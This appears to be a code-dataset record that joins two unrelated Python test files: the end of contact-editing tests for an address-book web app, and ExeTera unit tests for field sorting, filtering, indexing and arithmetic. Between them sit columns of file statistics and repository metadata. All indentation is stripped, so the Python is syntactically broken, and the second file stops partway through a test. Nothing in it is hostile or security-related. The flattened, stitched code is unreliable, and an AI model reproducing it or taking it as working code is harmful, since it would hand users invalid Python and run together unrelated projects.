# old_contacts = app.contact.get_contact_list()
# contact.id = old_contacts[0].id
# app.contact.go_to_editpage_from_homepage(0)
# app.contact.edit_contact(contact)
# assert len(old_contacts) == app.contact.count()
# new_contacts = app.contact.get_contact_list()
# old_contacts[0] = contact
# assert sorted(old_contacts, key=Contact.id_or_max) == sorted(new_contacts, key=Contact.id_or_max)
#def test_edit_first_contact_from_details(app):
# if app.contact.count() == 0:
# app.contact.create(Contact(firstname="test"))
# contact = Contact(firstname="first", middlename="Jasd", lastname="editing", nickname="Madsti",
# title="adasor", company="Hoasdadood", address="Ladngeles")
# old_contacts = app.contact.get_contact_list()
# contact.id = old_contacts[0].id
# app.contact.go_to_editpage_from_details(0)
# app.contact.edit_contact(contact)
# assert len(old_contacts) == app.contact.count()
# new_contacts = app.contact.get_contact_list()
# old_contacts[0] = contact
# assert sorted(old_contacts, key=Contact.id_or_max) == sorted(new_contacts, key=Contact.id_or_max)
def test_edit_rand_contact_from_homepage(app, db, check_ui, data_contact):
contact = data_contact
if len(db.get_contact_list()) == 0:
app.contact.create(Contact(firstname="test"))
old_contacts = db.get_contact_list()
edcontact = random.choice(old_contacts)
contact.id = edcontact.id
app.contact.go_to_editpage_by_id_from_homepage(contact.id)
app.contact.edit_contact(contact)
new_contacts = db.get_contact_list()
old_contacts.remove(edcontact)
for atr in contact.__dict__:
if contact.__dict__[atr] is not None:
edcontact.__dict__[atr] = contact.__dict__[atr]
old_contacts.append(edcontact)
assert sorted(old_contacts, key=Contact.id_or_max) == sorted(new_contacts, key=Contact.id_or_max)
if check_ui:
assert sorted(map(app.contact.clean, db.get_contact_list()), key=Contact.id_or_max) == \
sorted(app.contact.get_contact_list(), key=Contact.id_or_max)
def test_edit_rand_contact_from_details(app, db, check_ui, json_contact):
contact = json_contact
if len(db.get_contact_list()) == 0:
app.contact.create(Contact(firstname="test"))
old_contacts = db.get_contact_list()
edcontact = random.choice(old_contacts)
contact.id = edcontact.id
app.contact.go_to_editpage_by_id_from_details(contact.id)
app.contact.edit_contact(contact)
new_contacts = db.get_contact_list()
old_contacts.remove(edcontact)
for atr in contact.__dict__:
if contact.__dict__[atr] is not None:
edcontact.__dict__[atr] = contact.__dict__[atr]
old_contacts.append(edcontact)
assert sorted(old_contacts, key=Contact.id_or_max) == sorted(new_contacts, key=Contact.id_or_max)
if check_ui:
assert sorted(map(app.contact.clean, db.get_contact_list()), key=Contact.id_or_max) == \
sorted(app.contact.get_contact_list(), key=Contact.id_or_max)
| 46.824324
| 102
| 0.711111
| 477
| 3,465
| 4.813417
| 0.138365
| 0.10453
| 0.085366
| 0.073171
| 0.915505
| 0.915505
| 0.896777
| 0.896777
| 0.896777
| 0.896777
| 0
| 0.003455
| 0.164791
| 3,465
| 73
| 103
| 47.465753
| 0.78991
| 0.413276
| 0
| 0.780488
| 0
| 0
| 0.005979
| 0
| 0
| 0
| 0
| 0
| 0.097561
| 1
| 0.04878
| false
| 0
| 0.04878
| 0
| 0.097561
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4f380d9971770a2bab414911f274c833c40843d2
| 54,090
|
py
|
Python
|
tests/test_fields.py
|
deng113jie/ExeTera
|
613532a419b93a9838bf5ae5594fc7bb9738cd03
|
[
"Apache-2.0"
] | 14
|
2021-03-01T16:57:46.000Z
|
2021-12-01T10:49:19.000Z
|
tests/test_fields.py
|
deng113jie/ExeTera
|
613532a419b93a9838bf5ae5594fc7bb9738cd03
|
[
"Apache-2.0"
] | 208
|
2021-02-16T13:47:04.000Z
|
2022-03-31T11:27:03.000Z
|
tests/test_fields.py
|
deng113jie/ExeTera
|
613532a419b93a9838bf5ae5594fc7bb9738cd03
|
[
"Apache-2.0"
] | 5
|
2021-03-08T08:50:26.000Z
|
2021-12-03T09:26:43.000Z
|
import unittest
import numpy as np
from io import BytesIO
import h5py
from exetera.core import session
from exetera.core import fields
from exetera.core import persistence as per
from exetera.core import field_importers as fi
from exetera.core import utils
class TestFieldExistence(unittest.TestCase):
def test_field_truthness(self):
bio = BytesIO()
with session.Session() as s:
dst = s.open_dataset(bio, "w", "src")
src=dst.create_dataframe('src')
f = s.create_indexed_string(src, "a")
self.assertTrue(bool(f))
f = s.create_fixed_string(src, "b", 5)
self.assertTrue(bool(f))
f = s.create_numeric(src, "c", "int32")
self.assertTrue(bool(f))
f = s.create_categorical(src, "d", "int8", {"no": 0, "yes": 1})
self.assertTrue(bool(f))
class TestFieldGetSpans(unittest.TestCase):
def test_get_spans(self):
'''
Here test only the numeric field, categorical field and fixed string field.
Indexed string see TestIndexedStringFields below
'''
vals = np.asarray([0, 1, 1, 3, 3, 6, 5, 5, 5], dtype=np.int32)
bio = BytesIO()
with session.Session() as s:
self.assertListEqual([0, 1, 3, 5, 6, 9], s.get_spans(vals).tolist())
dst = s.open_dataset(bio, "w", "src")
ds = dst.create_dataframe('src')
vals_f = s.create_numeric(ds, "vals", "int32")
vals_f.data.write(vals)
self.assertListEqual([0, 1, 3, 5, 6, 9], vals_f.get_spans().tolist())
fxdstr = s.create_fixed_string(ds, 'fxdstr', 2)
fxdstr.data.write(np.asarray(['aa', 'bb', 'bb', 'cc', 'cc', 'dd', 'dd', 'dd', 'ee'], dtype='S2'))
self.assertListEqual([0,1,3,5,8,9],list(fxdstr.get_spans()))
cat = s.create_categorical(ds, 'cat', 'int8', {'a': 1, 'b': 2})
cat.data.write([1, 1, 2, 2, 1, 1, 1, 2, 2, 2, 1, 2, 1, 2])
self.assertListEqual([0,2,4,7,10,11,12,13,14],list(cat.get_spans()))
class TestIsSorted(unittest.TestCase):
def test_indexed_string_is_sorted(self):
bio = BytesIO()
with session.Session() as s:
ds = s.open_dataset(bio, 'w', 'ds')
df = ds.create_dataframe('foo')
f = df.create_indexed_string('f')
vals = ['the', 'quick', '', 'brown', 'fox', 'jumps', '', 'over', 'the', 'lazy', '', 'dog']
f.data.write(vals)
self.assertFalse(f.is_sorted())
f2 = df.create_indexed_string('f2')
svals = sorted(vals)
f2.data.write(svals)
self.assertTrue(f2.is_sorted())
def test_fixed_string_is_sorted(self):
bio = BytesIO()
with session.Session() as s:
ds = s.open_dataset(bio, 'w', 'ds')
df = ds.create_dataframe('foo')
f = df.create_fixed_string('f', 5)
vals = ['a', 'ba', 'bb', 'bac', 'de', 'ddddd', 'deff', 'aaaa', 'ccd']
f.data.write([v.encode() for v in vals])
self.assertFalse(f.is_sorted())
f2 = df.create_fixed_string('f2', 5)
svals = sorted(vals)
f2.data.write([v.encode() for v in svals])
self.assertTrue(f2.is_sorted())
def test_numeric_is_sorted(self):
bio = BytesIO()
with session.Session() as s:
ds = s.open_dataset(bio, 'w', 'ds')
df = ds.create_dataframe('foo')
f = df.create_numeric('f', 'int32')
vals = [74, 1897, 298, 0, -100098, 380982340, 8, 6587, 28421, 293878]
f.data.write(vals)
self.assertFalse(f.is_sorted())
f2 = df.create_numeric('f2', 'int32')
svals = sorted(vals)
f2.data.write(svals)
self.assertTrue(f2.is_sorted())
def test_categorical_is_sorted(self):
bio = BytesIO()
with session.Session() as s:
ds = s.open_dataset(bio, 'w', 'ds')
df = ds.create_dataframe('foo')
f = df.create_categorical('f', 'int8', {'a': 0, 'c': 1, 'd': 2, 'b': 3})
vals = [0, 1, 3, 2, 3, 2, 2, 0, 0, 1, 2]
f.data.write(vals)
self.assertFalse(f.is_sorted())
f2 = df.create_categorical('f2', 'int8', {'a': 0, 'c': 1, 'd': 2, 'b': 3})
svals = sorted(vals)
f2.data.write(svals)
self.assertTrue(f2.is_sorted())
def test_timestamp_is_sorted(self):
from datetime import datetime as D
from datetime import timedelta as T
bio = BytesIO()
with session.Session() as s:
ds = s.open_dataset(bio, 'w', 'ds')
df = ds.create_dataframe('foo')
f = df.create_timestamp('f')
d = D(2020, 5, 10)
vals = [d + T(seconds=50000), d - T(days=280), d + T(weeks=2), d + T(weeks=250),
d - T(weeks=378), d + T(hours=2897), d - T(days=23), d + T(minutes=39873)]
vals = [v.timestamp() for v in vals]
f.data.write(vals)
self.assertFalse(f.is_sorted())
f2 = df.create_timestamp('f2')
svals = sorted(vals)
f2.data.write(svals)
self.assertTrue(f2.is_sorted())
class TestIndexedStringFields(unittest.TestCase):
def test_create_indexed_string(self):
bio = BytesIO()
with session.Session() as s:
ds = s.open_dataset(bio, 'w', 'src')
df = ds.create_dataframe('src')
f = df.create_indexed_string('f')
d = f.data[:]
print(d)
def test_filter_indexed_string(self):
bio = BytesIO()
with session.Session() as s:
dst = s.open_dataset(bio, "w", "src")
hf = dst.create_dataframe('src')
data = ['a', 'bb', 'ccc', 'dddd']
indices, values, offsets, written_row_count = utils.one_dim_data_to_indexed_for_test(data, 10)
foo = fi.IndexedStringImporter(s, hf, 'foo')
foo.import_part(indices, values, offsets, 0, written_row_count)
self.assertListEqual([0, 1, 3, 6, 10], hf['foo'].indices[:].tolist())
f2 = s.create_indexed_string(hf, 'bar')
s.apply_filter(np.asarray([False, True, True, False]), hf['foo'], f2)
self.assertListEqual([0, 2, 5], f2.indices[:].tolist())
self.assertListEqual([98, 98, 99, 99, 99], f2.values[:].tolist())
self.assertListEqual(['bb', 'ccc'], f2.data[:])
self.assertEqual('bb', f2.data[0])
self.assertEqual('ccc', f2.data[1])
def test_reindex_indexed_string(self):
bio = BytesIO()
with session.Session() as s:
dst = s.open_dataset(bio, "w", "src")
hf = dst.create_dataframe('src')
data = ['a', 'bb', 'ccc', 'dddd']
indices, values, offsets, written_row_count = utils.one_dim_data_to_indexed_for_test(data, 10)
foo = fi.IndexedStringImporter(s, hf, 'foo')
foo.import_part(indices, values, offsets, 0, written_row_count)
self.assertListEqual([0, 1, 3, 6, 10], hf['foo'].indices[:].tolist())
f2 = s.create_indexed_string(hf, 'bar')
s.apply_index(np.asarray([3, 0, 2, 1], dtype=np.int64), hf['foo'], f2)
self.assertListEqual([0, 4, 5, 8, 10], f2.indices[:].tolist())
self.assertListEqual([100, 100, 100, 100, 97, 99, 99, 99, 98, 98],
f2.values[:].tolist())
self.assertListEqual(['dddd', 'a', 'ccc', 'bb'], f2.data[:])
def test_update_legacy_indexed_string_that_has_uint_values(self):
bio = BytesIO()
with session.Session() as s:
dst = s.open_dataset(bio, "w", "src")
hf = dst.create_dataframe('src')
data = ['a', 'bb', 'ccc', 'dddd']
indices, values, offsets, written_row_count = utils.one_dim_data_to_indexed_for_test(data, 10)
foo = fi.IndexedStringImporter(s, hf, 'foo')
foo.import_part(indices, values, offsets, 0, written_row_count)
self.assertListEqual([97, 98, 98, 99, 99, 99, 100, 100, 100, 100], hf['foo'].values[:].tolist())
def test_index_string_field_get_span(self):
bio = BytesIO()
with session.Session() as s:
dst = s.open_dataset(bio, "w", "src")
ds = dst.create_dataframe('src')
idx = s.create_indexed_string(ds, 'idx')
idx.data.write(['aa', 'bb', 'bb', 'c', 'c', 'c', 'ddd', 'ddd', 'e', 'f', 'f', 'f'])
self.assertListEqual([0, 1, 3, 6, 8, 9, 12], s.get_spans(idx))
class TestFieldArray(unittest.TestCase):
def test_write_part(self):
bio = BytesIO()
s = session.Session()
ds = s.open_dataset(bio, "w", "src")
dst = ds.create_dataframe('src')
num = s.create_numeric(dst, 'num', 'int32')
num.data.write_part(np.arange(10))
self.assertListEqual([0, 1, 2, 3, 4, 5, 6, 7, 8, 9], list(num.data[:]))
def test_clear(self):
bio = BytesIO()
s = session.Session()
ds = s.open_dataset(bio, "w", "src")
dst = ds.create_dataframe('src')
num = s.create_numeric(dst, 'num', 'int32')
num.data.write_part(np.arange(10))
num.data.clear()
self.assertListEqual([], list(num.data[:]))
class TestMemoryFieldCreateLike(unittest.TestCase):
def test_categorical_create_like(self):
bio = BytesIO()
with session.Session() as s:
ds = s.open_dataset(bio, 'w', 'ds')
df = ds.create_dataframe('df')
foo = df.create_categorical('foo', 'int8', {b'a': 0, b'b': 1})
foo.data.write(np.array([0, 1, 1, 0]))
foo2 = foo.create_like(df, 'foo2')
foo2.data.write(foo)
self.assertListEqual([0, 1, 1, 0], foo2.data[:].tolist())
def test_numeric_create_like(self):
bio = BytesIO()
with session.Session() as s:
ds = s.open_dataset(bio, 'w', 'ds')
df = ds.create_dataframe('df')
foo = df.create_numeric('foo', 'int32')
foo.data.write(np.array([1, 2, 3, 4]))
mfoo = foo + 1
foo2 = mfoo.create_like(df, 'foo2')
foo2.data.write(mfoo)
self.assertListEqual([2, 3, 4, 5], foo2.data[:].tolist())
class TestMemoryFields(unittest.TestCase):
def _execute_memory_field_test(self, a1, a2, scalar, function):
def test_simple(expected, actual):
self.assertListEqual(expected.tolist(), actual.data[:].tolist())
def test_tuple(expected, actual):
self.assertListEqual(expected[0].tolist(), actual[0].data[:].tolist())
self.assertListEqual(expected[1].tolist(), actual[1].data[:].tolist())
expected = function(a1, a2)
expected_scalar = function(a1, scalar)
expected_rscalar = function(scalar, a2)
test_equal = test_tuple if isinstance(expected, tuple) else test_simple
s = session.Session()
f1 = fields.NumericMemField(s, 'int32')
f2 = fields.NumericMemField(s, 'int32')
f1.data.write(a1)
f2.data.write(a2)
test_equal(expected, function(f1, f2))
test_equal(expected, function(f1, a2))
test_equal(expected, function(fields.as_field(a1), f2))
test_equal(expected_scalar, function(f1, 1))
test_equal(expected_rscalar, function(1, f2))
def _execute_field_test(self, a1, a2, scalar, function):
def test_simple(expected, actual):
self.assertListEqual(expected.tolist(), actual.data[:].tolist())
def test_tuple(expected, actual):
self.assertListEqual(expected[0].tolist(), actual[0].data[:].tolist())
self.assertListEqual(expected[1].tolist(), actual[1].data[:].tolist())
expected = function(a1, a2)
expected_scalar = function(a1, scalar)
expected_rscalar = function(scalar, a2)
test_equal = test_tuple if isinstance(expected, tuple) else test_simple
bio = BytesIO()
with session.Session() as s:
ds = s.open_dataset(bio, 'w', 'ds')
df = ds.create_dataframe('df')
m1 = fields.NumericMemField(s, fields.dtype_to_str(a1.dtype))
m2 = fields.NumericMemField(s, fields.dtype_to_str(a2.dtype))
m1.data.write(a1)
m2.data.write(a2)
f1 = df.create_numeric('f1', fields.dtype_to_str(a1.dtype))
f2 = df.create_numeric('f2', fields.dtype_to_str(a2.dtype))
f1.data.write(a1)
f2.data.write(a2)
# test memory field and field operations
test_equal(expected, function(f1, f2))
test_equal(expected, function(f1, m2))
test_equal(expected, function(m1, f2))
test_equal(expected_scalar, function(f1, scalar))
test_equal(expected_rscalar, function(scalar, f2))
# test that the resulting memory field writes to a non-memory field properly
r = function(f1, f2)
if isinstance(r, tuple):
df.create_numeric(
'f3a', fields.dtype_to_str(r[0].data.dtype)).data.write(r[0])
df.create_numeric(
'f3b', fields.dtype_to_str(r[1].data.dtype)).data.write(r[1])
test_simple(expected[0], df['f3a'])
test_simple(expected[1], df['f3b'])
else:
df.create_numeric(
'f3', fields.dtype_to_str(r.data.dtype)).data.write(r)
test_simple(expected, df['f3'])
def test_mixed_field_add(self):
a1 = np.array([1, 2, 3, 4], dtype=np.int32)
a2 = np.array([2, 3, 4, 5], dtype=np.int32)
self._execute_memory_field_test(a1, a2, 1, lambda x, y: x + y)
self._execute_field_test(a1, a2, 1, lambda x, y: x + y)
def test_mixed_field_sub(self):
a1 = np.array([1, 2, 3, 4], dtype=np.int32)
a2 = np.array([2, 3, 4, 5], dtype=np.int32)
self._execute_memory_field_test(a1, a2, 1, lambda x, y: x - y)
self._execute_field_test(a1, a2, 1, lambda x, y: x - y)
def test_mixed_field_mul(self):
a1 = np.array([1, 2, 3, 4], dtype=np.int32)
a2 = np.array([2, 3, 4, 5], dtype=np.int32)
self._execute_memory_field_test(a1, a2, 1, lambda x, y: x * y)
self._execute_field_test(a1, a2, 1, lambda x, y: x * y)
def test_mixed_field_div(self):
a1 = np.array([1, 2, 3, 4], dtype=np.int32)
a2 = np.array([2, 3, 4, 5], dtype=np.int32)
self._execute_memory_field_test(a1, a2, 1, lambda x, y: x / y)
self._execute_field_test(a1, a2, 1, lambda x, y: x / y)
def test_mixed_field_floordiv(self):
a1 = np.array([1, 2, 3, 4], dtype=np.int32)
a2 = np.array([2, 3, 4, 5], dtype=np.int32)
self._execute_memory_field_test(a1, a2, 1, lambda x, y: x // y)
self._execute_field_test(a1, a2, 1, lambda x, y: x // y)
def test_mixed_field_mod(self):
a1 = np.array([1, 2, 3, 4], dtype=np.int32)
a2 = np.array([2, 3, 4, 5], dtype=np.int32)
self._execute_memory_field_test(a1, a2, 1, lambda x, y: x % y)
self._execute_field_test(a1, a2, 1, lambda x, y: x % y)
def test_mixed_field_divmod(self):
a1 = np.array([1, 2, 3, 4], dtype=np.int32)
a2 = np.array([2, 3, 4, 5], dtype=np.int32)
self._execute_memory_field_test(a1, a2, 1, lambda x, y: divmod(x, y))
self._execute_field_test(a1, a2, 1, lambda x, y: divmod(x, y))
def test_mixed_field_and(self):
a1 = np.array([1, 2, 3, 4], dtype=np.int32)
a2 = np.array([2, 3, 4, 5], dtype=np.int32)
self._execute_memory_field_test(a1, a2, 1, lambda x, y: x & y)
self._execute_field_test(a1, a2, 1, lambda x, y: x & y)
def test_mixed_field_xor(self):
a1 = np.array([1, 2, 3, 4], dtype=np.int32)
a2 = np.array([2, 3, 4, 5], dtype=np.int32)
self._execute_memory_field_test(a1, a2, 1, lambda x, y: x ^ y)
self._execute_field_test(a1, a2, 1, lambda x, y: x ^ y)
def test_mixed_field_or(self):
a1 = np.array([1, 2, 3, 4], dtype=np.int32)
a2 = np.array([2, 3, 4, 5], dtype=np.int32)
self._execute_memory_field_test(a1, a2, 1, lambda x, y: x | y)
self._execute_field_test(a1, a2, 1, lambda x, y: x | y)
def test_less_than(self):
a1 = np.array([1, 2, 3, 4], dtype=np.int32)
r = 1 < a1
a2 = np.array([5, 4, 3, 2], dtype=np.int32)
self._execute_memory_field_test(a1, a2, 1, lambda x, y: x < y)
def test_less_than_equal(self):
a1 = np.array([1, 2, 3, 4], dtype=np.int32)
r = 1 < a1
a2 = np.array([5, 4, 3, 2], dtype=np.int32)
self._execute_memory_field_test(a1, a2, 1, lambda x, y: x <= y)
def test_equal(self):
a1 = np.array([1, 2, 3, 4], dtype=np.int32)
r = 1 < a1
a2 = np.array([5, 4, 3, 2], dtype=np.int32)
self._execute_memory_field_test(a1, a2, 1, lambda x, y: x == y)
def test_not_equal(self):
a1 = np.array([1, 2, 3, 4], dtype=np.int32)
r = 1 < a1
a2 = np.array([5, 4, 3, 2], dtype=np.int32)
self._execute_memory_field_test(a1, a2, 1, lambda x, y: x != y)
def test_greater_than_equal(self):
a1 = np.array([1, 2, 3, 4], dtype=np.int32)
r = 1 < a1
a2 = np.array([5, 4, 3, 2], dtype=np.int32)
self._execute_memory_field_test(a1, a2, 1, lambda x, y: x >= y)
def test_greater_than(self):
a1 = np.array([1, 2, 3, 4], dtype=np.int32)
r = 1 < a1
a2 = np.array([5, 4, 3, 2], dtype=np.int32)
self._execute_memory_field_test(a1, a2, 1, lambda x, y: x > y)
def test_categorical_remap(self):
bio = BytesIO()
with session.Session() as s:
ds = s.open_dataset(bio, 'w', 'ds')
df = ds.create_dataframe('df')
foo = df.create_categorical('foo', 'int8', {b'a': 1, b'b': 2})
foo.data.write(np.array([1, 2, 2, 1], dtype='int8'))
mbar = foo.remap([(1, 0), (2, 1)], {b'a': 0, b'b': 1})
self.assertListEqual([0, 1, 1, 0], mbar.data[:].tolist())
self.assertDictEqual({0: b'a', 1: b'b'}, mbar.keys)
bar = mbar.create_like(df, 'bar')
bar.data.write(mbar)
self.assertListEqual([0, 1, 1, 0], mbar.data[:].tolist())
self.assertDictEqual({0: b'a', 1: b'b'}, mbar.keys)
class TestFieldApplyFilter(unittest.TestCase):
def test_indexed_string_apply_filter(self):
data = ['a', 'bb', 'ccc', 'dddd', '', 'eeee', 'fff', 'gg', 'h']
filt = np.array([0, 1, 0, 1, 0, 1, 0, 1, 0], dtype=bool)
expected_indices = [0, 1, 3, 6, 10, 10, 14, 17, 19, 20]
expected_values = [97, 98, 98, 99, 99, 99, 100, 100, 100, 100,
101, 101, 101, 101, 102, 102, 102, 103, 103, 104]
expected_filt_indices = [0, 2, 6, 10, 12]
expected_filt_values = [98, 98, 100, 100, 100, 100, 101, 101, 101, 101, 103, 103]
expected_filt_data = ['bb', 'dddd', 'eeee', 'gg']
bio = BytesIO()
with session.Session() as s:
ds = s.open_dataset(bio, 'w', 'ds')
df = ds.create_dataframe('df')
f = df.create_indexed_string('f')
f.data.write(data)
self.assertListEqual(expected_indices, f.indices[:].tolist())
self.assertListEqual(expected_values, f.values[:].tolist())
self.assertListEqual(data, f.data[:])
ff = f.apply_filter(filt, in_place=True)
self.assertListEqual(expected_filt_indices, f.indices[:].tolist())
self.assertListEqual(expected_filt_values, f.values[:].tolist())
self.assertListEqual(expected_filt_data, f.data[:])
self.assertListEqual(expected_filt_indices, ff.indices[:].tolist())
self.assertListEqual(expected_filt_values, ff.values[:].tolist())
self.assertListEqual(expected_filt_data, ff.data[:])
g = f.create_like(df, 'g')
g.data.write(data)
fg = f.create_like(df, 'fg')
fgr = g.apply_filter(filt, fg)
self.assertListEqual(expected_filt_indices, fg.indices[:].tolist())
self.assertListEqual(expected_filt_values, fg.values[:].tolist())
self.assertListEqual(expected_filt_data, fg.data[:])
self.assertListEqual(expected_filt_indices, fgr.indices[:].tolist())
self.assertListEqual(expected_filt_values, fgr.values[:].tolist())
self.assertListEqual(expected_filt_data, fgr.data[:])
fh = g.apply_filter(filt)
self.assertListEqual(expected_filt_indices, fh.indices[:].tolist())
self.assertListEqual(expected_filt_values, fh.values[:].tolist())
self.assertListEqual(expected_filt_data, fh.data[:])
mf = fields.IndexedStringMemField(s)
mf.data.write(data)
self.assertListEqual(expected_indices, mf.indices[:].tolist())
self.assertListEqual(expected_values, mf.values[:].tolist())
self.assertListEqual(data, mf.data[:])
mf.apply_filter(filt, in_place=True)
self.assertListEqual(expected_filt_indices, mf.indices[:].tolist())
self.assertListEqual(expected_filt_values, mf.values[:].tolist())
self.assertListEqual(expected_filt_data, mf.data[:])
b = df.create_indexed_string('bar')
b.data.write(data)
self.assertListEqual(expected_indices, b.indices[:].tolist())
self.assertListEqual(expected_values, b.values[:].tolist())
self.assertListEqual(data, b.data[:])
mb = b.apply_filter(filt)
self.assertListEqual(expected_filt_indices, mb.indices[:].tolist())
self.assertListEqual(expected_filt_values, mb.values[:].tolist())
self.assertListEqual(expected_filt_data, mb.data[:])
df2 = ds.create_dataframe("filter")
def test_fixed_string_apply_filter(self):
data = np.array([b'a', b'bb', b'ccc', b'dddd', b'eeee', b'fff', b'gg', b'h'], dtype='S4')
filt = np.array([0, 1, 0, 1, 0, 1, 0, 1], dtype=bool)
expected = [b'bb', b'dddd', b'fff', b'h']
bio = BytesIO()
with session.Session() as s:
ds = s.open_dataset(bio, 'w', 'ds')
df = ds.create_dataframe('df')
f = df.create_fixed_string('foo', 4)
f.data.write(data)
self.assertListEqual(data.tolist(), f.data[:].tolist())
ff = f.apply_filter(filt, in_place=True)
self.assertListEqual(expected, f.data[:].tolist())
self.assertListEqual(expected, ff.data[:].tolist())
g = f.create_like(df, 'g')
g.data.write(data)
fg = f.create_like(df, 'fg')
fgr = g.apply_filter(filt, fg)
self.assertListEqual(expected, fg.data[:].tolist())
self.assertListEqual(expected, fgr.data[:].tolist())
fh = g.apply_filter(filt)
self.assertListEqual(expected, fh.data[:].tolist())
mf = fields.FixedStringMemField(s, 4)
mf.data.write(data)
self.assertListEqual(data.tolist(), mf.data[:].tolist())
mf.apply_filter(filt, in_place=True)
self.assertListEqual(expected, mf.data[:].tolist())
b = df.create_fixed_string('bar', 4)
b.data.write(data)
self.assertListEqual(data.tolist(), b.data[:].tolist())
mb = b.apply_filter(filt)
self.assertListEqual(expected, mb.data[:].tolist())
def test_numeric_apply_filter(self):
data = np.array([1, 2, 3, 4, 5, 6, 7, 8, 9], dtype=np.int32)
filt = np.array([0, 1, 0, 1, 0, 1, 0, 1, 0], dtype=bool)
expected = [2, 4, 6, 8]
bio = BytesIO()
with session.Session() as s:
ds = s.open_dataset(bio, 'w', 'ds')
df = ds.create_dataframe('df')
f = df.create_numeric('foo', 'int32')
f.data.write(data)
self.assertListEqual(data.tolist(), f.data[:].tolist())
ff = f.apply_filter(filt, in_place=True)
self.assertListEqual(expected, f.data[:].tolist())
self.assertListEqual(expected, ff.data[:].tolist())
g = f.create_like(df, 'g')
g.data.write(data)
fg = f.create_like(df, 'fg')
fgr = g.apply_filter(filt, fg)
self.assertListEqual(expected, fg.data[:].tolist())
self.assertListEqual(expected, fgr.data[:].tolist())
fh = g.apply_filter(filt)
self.assertListEqual(expected, fh.data[:].tolist())
mf = fields.NumericMemField(s, 'int32')
mf.data.write(data)
self.assertListEqual(data.tolist(), mf.data[:].tolist())
mf.apply_filter(filt, in_place=True)
self.assertListEqual(expected, mf.data[:].tolist())
b = df.create_numeric('bar', 'int32')
b.data.write(data)
self.assertListEqual(data.tolist(), b.data[:].tolist())
mb = b.apply_filter(filt)
self.assertListEqual(expected, mb.data[:].tolist())
def test_categorical_apply_filter(self):
data = np.array([0, 1, 2, 0, 1, 2, 2, 1, 0], dtype=np.int32)
keys = {b'a': 0, b'b': 1, b'c': 2}
filt = np.array([0, 1, 0, 1, 0, 1, 0, 1, 0], dtype=bool)
expected = [1, 0, 2, 1]
bio = BytesIO()
with session.Session() as s:
ds = s.open_dataset(bio, 'w', 'ds')
df = ds.create_dataframe('df')
f = df.create_categorical('foo', 'int8', keys)
f.data.write(data)
self.assertListEqual(data.tolist(), f.data[:].tolist())
ff = f.apply_filter(filt, in_place=True)
self.assertListEqual(expected, f.data[:].tolist())
self.assertListEqual(expected, ff.data[:].tolist())
g = f.create_like(df, 'g')
g.data.write(data)
fg = f.create_like(df, 'fg')
fgr = g.apply_filter(filt, fg)
self.assertListEqual(expected, fg.data[:].tolist())
self.assertListEqual(expected, fgr.data[:].tolist())
fh = g.apply_filter(filt)
self.assertListEqual(expected, fh.data[:].tolist())
mf = fields.CategoricalMemField(s, 'int8', keys)
mf.data.write(data)
self.assertListEqual(data.tolist(), mf.data[:].tolist())
mf.apply_filter(filt, in_place=True)
self.assertListEqual(expected, mf.data[:].tolist())
b = df.create_categorical('bar', 'int8', keys)
b.data.write(data)
self.assertListEqual(data.tolist(), b.data[:].tolist())
mb = b.apply_filter(filt)
self.assertListEqual(expected, mb.data[:].tolist())
def test_timestamp_apply_filter(self):
from datetime import datetime as D
from datetime import timezone
data = [D(2020, 1, 1, tzinfo=timezone.utc), D(2021, 5, 18, tzinfo=timezone.utc), D(2950, 8, 17, tzinfo=timezone.utc), D(1840, 10, 11, tzinfo=timezone.utc),
D(2110, 11, 1, tzinfo=timezone.utc), D(2002, 3, 3, tzinfo=timezone.utc), D(2018, 2, 28, tzinfo=timezone.utc), D(2400, 9, 1, tzinfo=timezone.utc)]
data = np.asarray([d.timestamp() for d in data], dtype=np.float64)
filt = np.array([0, 1, 0, 1, 0, 1, 0, 1], dtype=bool)
expected = data[filt].tolist()
bio = BytesIO()
with session.Session() as s:
ds = s.open_dataset(bio, 'w', 'ds')
df = ds.create_dataframe('df')
f = df.create_timestamp('foo')
f.data.write(data)
self.assertListEqual(data.tolist(), f.data[:].tolist())
ff = f.apply_filter(filt, in_place=True)
self.assertListEqual(expected, f.data[:].tolist())
self.assertListEqual(expected, ff.data[:].tolist())
g = f.create_like(df, 'g')
g.data.write(data)
fg = f.create_like(df, 'fg')
fgr = g.apply_filter(filt, fg)
self.assertListEqual(expected, fg.data[:].tolist())
self.assertListEqual(expected, fgr.data[:].tolist())
fh = g.apply_filter(filt)
self.assertListEqual(expected, fh.data[:].tolist())
mf = fields.TimestampMemField(s)
mf.data.write(data)
self.assertListEqual(data.tolist(), mf.data[:].tolist())
mf.apply_filter(filt, in_place=True)
self.assertListEqual(expected, mf.data[:].tolist())
b = df.create_timestamp('bar')
b.data.write(data)
self.assertListEqual(data.tolist(), b.data[:].tolist())
mb = b.apply_filter(filt)
self.assertListEqual(expected, mb.data[:].tolist())
class TestFieldApplyIndex(unittest.TestCase):
def test_indexed_string_apply_index(self):
data = ['a', 'bb', 'ccc', 'dddd', '', 'eeee', 'fff', 'gg', 'h']
inds = np.array([8, 0, 7, 1, 6, 2, 5, 3, 4], dtype=np.int32)
expected_indices = [0, 1, 3, 6, 10, 10, 14, 17, 19, 20]
expected_values = [97, 98, 98, 99, 99, 99, 100, 100, 100, 100,
101, 101, 101, 101, 102, 102, 102, 103, 103, 104]
expected_filt_indices = [0, 1, 2, 4, 6, 9, 12, 16, 20, 20]
expected_filt_values = [104, 97, 103, 103, 98, 98, 102, 102, 102, 99, 99, 99,
101, 101, 101, 101, 100, 100, 100, 100]
expected_filt_data = ['h', 'a', 'gg', 'bb', 'fff', 'ccc', 'eeee', 'dddd', '']
bio = BytesIO()
with session.Session() as s:
ds = s.open_dataset(bio, 'w', 'ds')
df = ds.create_dataframe('df')
f = df.create_indexed_string('foo')
f.data.write(data)
self.assertListEqual(expected_indices, f.indices[:].tolist())
self.assertListEqual(expected_values, f.values[:].tolist())
self.assertListEqual(data, f.data[:])
ff = f.apply_index(inds, in_place=True)
self.assertListEqual(expected_filt_indices, f.indices[:].tolist())
self.assertListEqual(expected_filt_values, f.values[:].tolist())
self.assertListEqual(expected_filt_data, f.data[:])
self.assertListEqual(expected_filt_indices, ff.indices[:].tolist())
self.assertListEqual(expected_filt_values, ff.values[:].tolist())
self.assertListEqual(expected_filt_data, ff.data[:])
g = f.create_like(df, 'g')
g.data.write(data)
